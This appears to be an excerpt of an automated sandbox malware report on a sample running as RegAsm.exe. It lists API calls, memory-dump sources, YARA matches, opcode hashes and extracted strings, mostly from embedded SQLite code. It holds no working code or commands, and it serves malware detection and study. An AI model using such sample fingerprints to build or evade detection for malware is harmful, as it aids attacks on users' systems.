                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: recursively defined fts5 content table
                                                                                                                                                                                                • API String ID: 0-437020801
                                                                                                                                                                                                • Opcode ID: d3bb32e9c12362acecfa0d8666f7d749dfbd655863d72f0f58ed7fe1bd565f23
                                                                                                                                                                                                • Instruction ID: 1d616ac343a92dc5c907979b46ff14cba206d4af478e3350a5ba95e8efd64569
                                                                                                                                                                                                • Opcode Fuzzy Hash: d3bb32e9c12362acecfa0d8666f7d749dfbd655863d72f0f58ed7fe1bd565f23
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DD1E071904341CFDB04CF19C580796BBE0FF89324F498A5EE9898B341D779E886CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __lock.LIBCMT ref: 00419C35
                                                                                                                                                                                                  • Part of subcall function 00418613: __mtinitlocknum.LIBCMT ref: 00418629
                                                                                                                                                                                                  • Part of subcall function 00418613: __amsg_exit.LIBCMT ref: 00418635
                                                                                                                                                                                                  • Part of subcall function 00418613: EnterCriticalSection.KERNEL32(00000000,00000000,?,00419281,0000000D,?,?,004196D5,00418172,?,?,0041727B,00000000,0042C868,004172C2,?), ref: 0041863D
                                                                                                                                                                                                • DecodePointer.KERNEL32(0042C7F0,00000020,00419D78,00000000,00000001,00000000,?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D), ref: 00419C71
                                                                                                                                                                                                • DecodePointer.KERNEL32(?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D,?,?,004196D5,00418172), ref: 00419C82
                                                                                                                                                                                                  • Part of subcall function 004191FA: EncodePointer.KERNEL32(00000000,0041CDCC,00640400,00000314,00000000,?,?,?,?,?,00419F8F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 004191FC
                                                                                                                                                                                                • DecodePointer.KERNEL32(-00000004,?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D,?,?,004196D5,00418172), ref: 00419CA8
                                                                                                                                                                                                • DecodePointer.KERNEL32(?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D,?,?,004196D5,00418172), ref: 00419CBB
                                                                                                                                                                                                • DecodePointer.KERNEL32(?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D,?,?,004196D5,00418172), ref: 00419CC5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2005412495-0
                                                                                                                                                                                                • Opcode ID: 4b294464a69c7ed5a0e400bc0e7b709ae240815f70b99885f44d4682db768394
                                                                                                                                                                                                • Instruction ID: 8bd5f59fe7337ac10d8a9351378d8553da16a8709647653562f13b28bf213590
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b294464a69c7ed5a0e400bc0e7b709ae240815f70b99885f44d4682db768394
                                                                                                                                                                                                • Instruction Fuzzy Hash: E0313B30A0031ADFEF119FA6E9946EDBBF1BB49314F14402BE551A6250EBBC4C81CF59
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • NEAR, xrefs: 1B53642A
                                                                                                                                                                                                • fts5 expression tree is too large (maximum depth %d), xrefs: 1B536349
                                                                                                                                                                                                • expected integer, got "%.*s", xrefs: 1B53648D
                                                                                                                                                                                                • fts5: syntax error near "%.*s", xrefs: 1B536436
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: NEAR$expected integer, got "%.*s"$fts5 expression tree is too large (maximum depth %d)$fts5: syntax error near "%.*s"
                                                                                                                                                                                                • API String ID: 0-2846580575
                                                                                                                                                                                                • Opcode ID: d0bf9b2ce691a0935b13cf38649da6b47293e14b98eb0e89174b1b1357f3efc9
                                                                                                                                                                                                • Instruction ID: 2f38d76bc392e1a9806f669bb1712bed72e678f91138eb1a9bb4e7d5835d7747
                                                                                                                                                                                                • Opcode Fuzzy Hash: d0bf9b2ce691a0935b13cf38649da6b47293e14b98eb0e89174b1b1357f3efc9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BC1BFB4908206AFEB219F60CA81FAAF7A9FF48705F04495CF8459B351E371E560CBB1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __getptd.LIBCMT ref: 00418A0C
                                                                                                                                                                                                  • Part of subcall function 00419364: __getptd_noexit.LIBCMT ref: 00419367
                                                                                                                                                                                                  • Part of subcall function 00419364: __amsg_exit.LIBCMT ref: 00419374
                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00418A2C
                                                                                                                                                                                                • __lock.LIBCMT ref: 00418A3C
                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00418A59
                                                                                                                                                                                                • _free.LIBCMT ref: 00418A6C
                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(0042E1C0), ref: 00418A84
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3470314060-0
                                                                                                                                                                                                • Opcode ID: 7bcf2295555902ab092b20074ac8eb7a5b11b88eb553fe5f09bd465897bee5fc
                                                                                                                                                                                                • Instruction ID: 94217c608b42283c6032a388305e1f98177ed79fe345041c0b305e5c649e8a26
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bcf2295555902ab092b20074ac8eb7a5b11b88eb553fe5f09bd465897bee5fc
                                                                                                                                                                                                • Instruction Fuzzy Hash: E2016132A01A21ABD721AB6698057DE73A0AF04794F48401FF810A7690DF3C6DC2CBDD
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • unable to delete/modify user-function due to active statements, xrefs: 1B59AD61
                                                                                                                                                                                                • misuse, xrefs: 1B59AE18
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B59AE1D
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B59AE0E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                • API String ID: 0-3864549341
                                                                                                                                                                                                • Opcode ID: 0ae138d884ac1ec2c0e320d2b242494fecb488ffd9753948c803d2a3b12a2b59
                                                                                                                                                                                                • Instruction ID: a91677b9bb422650a84ea6bbe8d1ef70b7db4816029b17eb1bbc92060eb1b261
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ae138d884ac1ec2c0e320d2b242494fecb488ffd9753948c803d2a3b12a2b59
                                                                                                                                                                                                • Instruction Fuzzy Hash: AE51D272608701AFEB148F24EC80BAFBBF5EFC9755F04492DF58696251E331D8418B62
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 04ca3edb700a2a30c4811362fe3df105aaacfb30bb0d14e6d1b12587a0a9e52f
                                                                                                                                                                                                • Instruction ID: 41b52844a0c1ad050ae1933bc516534e7550096df24f3838d1bd5316a3509f75
                                                                                                                                                                                                • Opcode Fuzzy Hash: 04ca3edb700a2a30c4811362fe3df105aaacfb30bb0d14e6d1b12587a0a9e52f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1671E6706043819FEB20CF24E845BDB7BE4AF89309F04C52CE89987342E775E455CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
                                                                                                                                                                                                • API String ID: 0-361449301
                                                                                                                                                                                                • Opcode ID: 4804bdf05f4c97bb6b22c567b89b465e66116af3435eaec5ba2806ee97cb366e
                                                                                                                                                                                                • Instruction ID: c14515cbb7db9074bcd0ac5717765558bc05ee083793fffd592d87f6186c0d60
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4804bdf05f4c97bb6b22c567b89b465e66116af3435eaec5ba2806ee97cb366e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9961B0B15007429FEB148F34D885B96B7F8AF64314F058D2DE897C6241E776E94CCBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
                                                                                                                                                                                                • API String ID: 0-593389478
                                                                                                                                                                                                • Opcode ID: f257b46eb8141f0e6c82e635d933f9ba07262f3e8b75d2be996c3fbd2148f551
                                                                                                                                                                                                • Instruction ID: ee6538ada1977533bb9f12c00dae7da5159f08d387362633424d04b5dc2164b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: f257b46eb8141f0e6c82e635d933f9ba07262f3e8b75d2be996c3fbd2148f551
                                                                                                                                                                                                • Instruction Fuzzy Hash: CF41F771A002459FFB25CF14DA80BEEB3A6EF84314F11456DF8468B211E7B5EC85CB95
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: cannot detach database %s$database %s is locked$main$no such database: %s
                                                                                                                                                                                                • API String ID: 0-3838832555
                                                                                                                                                                                                • Opcode ID: e36ae95eaa9055c1fce3513a16641085db3a1f4862105aa551c6fa0b23770fe0
                                                                                                                                                                                                • Instruction ID: 53338d2499f35d000744a8bf3cafd9f56484b96acb3d070ef9fdfdabca2fa834
                                                                                                                                                                                                • Opcode Fuzzy Hash: e36ae95eaa9055c1fce3513a16641085db3a1f4862105aa551c6fa0b23770fe0
                                                                                                                                                                                                • Instruction Fuzzy Hash: C151E2B9A002219FEB14CF14D890B97B7A5BF98B14F11C55DE8988B391DB71E841CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4DF4BA
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4DF4BF
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4DF4B0
                                                                                                                                                                                                • unable to delete/modify collation sequence due to active statements, xrefs: 1B4DF533
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                • API String ID: 0-3348720253
                                                                                                                                                                                                • Opcode ID: 5fb82566de6640cfb5d93d6e56e32137ecf3df1e4bdb5b922e3ead2d95becf17
                                                                                                                                                                                                • Instruction ID: 2afc4a3b81f5c3dae25ec00bb60ff291ebf531f348e1932ee4d38e2546473441
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fb82566de6640cfb5d93d6e56e32137ecf3df1e4bdb5b922e3ead2d95becf17
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB416B726003009BD710AF24ECA0BEAB7E4EF9132AF14856EF5948B382D336F515C761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN), xrefs: 1B4C4CCB
                                                                                                                                                                                                • invalid arguments to fts4aux constructor, xrefs: 1B4C4C9E
                                                                                                                                                                                                • temp, xrefs: 1B4C4C3E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN)$invalid arguments to fts4aux constructor$temp
                                                                                                                                                                                                • API String ID: 0-537686372
                                                                                                                                                                                                • Opcode ID: 854c99df383dd82bc05638654dba62310202b7aee12d3785a1452641acb951fe
                                                                                                                                                                                                • Instruction ID: cfb3bffb579b7f6fdb27e4495208eb39e40c7117f2624759d4b86e96fb5915a1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 854c99df383dd82bc05638654dba62310202b7aee12d3785a1452641acb951fe
                                                                                                                                                                                                • Instruction Fuzzy Hash: C941277A5042459FCB148F68D980AEB7FF5EF55224F15C4ADECD58B312D632E902CB60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!.*f
                                                                                                                                                                                                • API String ID: 0-786758813
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                • memset.MSVCRT ref: 00406457
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                                                                                                                                • String ID: v10
                                                                                                                                                                                                • API String ID: 2733184300-1337588462
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B56EC4C
                                                                                                                                                                                                • CREATE , xrefs: 1B56EBFF
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B56EC51
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B56EC42
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-1360532505
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
                                                                                                                                                                                                • API String ID: 0-453588374
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 89f835234ccc2f1204f4c2dc90640c1dcab4e20a551e9bac9030d573ae9b3bc3
                                                                                                                                                                                                • Instruction ID: 30459d0692fc87d67ecba9e35353673ee16c608c8d07b40c86f6d0ee170af1a5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 89f835234ccc2f1204f4c2dc90640c1dcab4e20a551e9bac9030d573ae9b3bc3
                                                                                                                                                                                                • Instruction Fuzzy Hash: D0312B797007909ED724DF28C991AF3BFF2AF99701B54859CD5C647786E322E841C760
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 6a3b2ebfd5293696c0530ae4d79350cbc4224a927ea99cb2596257b2fdfe940f
                                                                                                                                                                                                • Instruction ID: c71767a39eb4191d008826bc0708d0f6fe8686ebec31ce59303233a07c37f8ea
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a3b2ebfd5293696c0530ae4d79350cbc4224a927ea99cb2596257b2fdfe940f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3731E87620464167C7119B29DD91BE6BFF0FF55312F08826AF458CB682D315E56097E0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4A1D46
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4A1D4B
                                                                                                                                                                                                • unknown database: %s, xrefs: 1B4A1CBD
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4A1D3C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
                                                                                                                                                                                                • API String ID: 0-142545749
                                                                                                                                                                                                • Opcode ID: d469296fc88d2a4bc16b5d0caa25f227fc66e5f95b9a1719c28c6302a6dcc7da
                                                                                                                                                                                                • Instruction ID: 8c8bc4408412691fac5ffa53ab6e8ba93419a56c87f9744fbaf520d13ddf31ae
                                                                                                                                                                                                • Opcode Fuzzy Hash: d469296fc88d2a4bc16b5d0caa25f227fc66e5f95b9a1719c28c6302a6dcc7da
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E21E2B5600741ABE7109B37EC44FDB7AA99FE33A9F00852CF89656381D721A505C772
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: d196f24e7a3e32e0f378c61ed39c9b8399bcbd1cfb105425b7f73cd9b7564d33
                                                                                                                                                                                                • Instruction ID: ab0440df05766d42f93edf920dc18c47b3018df89a253bdb25b8fce6b5d2c993
                                                                                                                                                                                                • Opcode Fuzzy Hash: d196f24e7a3e32e0f378c61ed39c9b8399bcbd1cfb105425b7f73cd9b7564d33
                                                                                                                                                                                                • Instruction Fuzzy Hash: E121F8B77003115BCB00EF18EC416EB7BE0EBA8651F41852AFD84D7341E325D55987E2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: eace1da236967c571629836e4f42c79364e55efe3d8ae2eae6794d4754787141
                                                                                                                                                                                                • Instruction ID: ce05444302f87699733b197a2afb8e20f87c6531dc723d72895bd34fee6c7163
                                                                                                                                                                                                • Opcode Fuzzy Hash: eace1da236967c571629836e4f42c79364e55efe3d8ae2eae6794d4754787141
                                                                                                                                                                                                • Instruction Fuzzy Hash: 59219B36604B909AD7219F289D82AE3BFF29F59301B44859CE1D287396F332F4818790
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040CF4C
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5A5
                                                                                                                                                                                                  • Part of subcall function 0041D590: __CxxThrowException@8.LIBCMT ref: 0041D5BA
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5CB
                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040CF6E
                                                                                                                                                                                                • memcpy.MSVCRT ref: 0040CFAB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                • API String ID: 214693668-4289949731
                                                                                                                                                                                                • Opcode ID: e8649d6854edcdf6cfa96b7bf6223182271f1766ac493d023adf57e450021f61
                                                                                                                                                                                                • Instruction ID: b0c2c1f02c177d2dc43bd4333e285784eff5f350866f00ec72c68241579f9700
                                                                                                                                                                                                • Opcode Fuzzy Hash: e8649d6854edcdf6cfa96b7bf6223182271f1766ac493d023adf57e450021f61
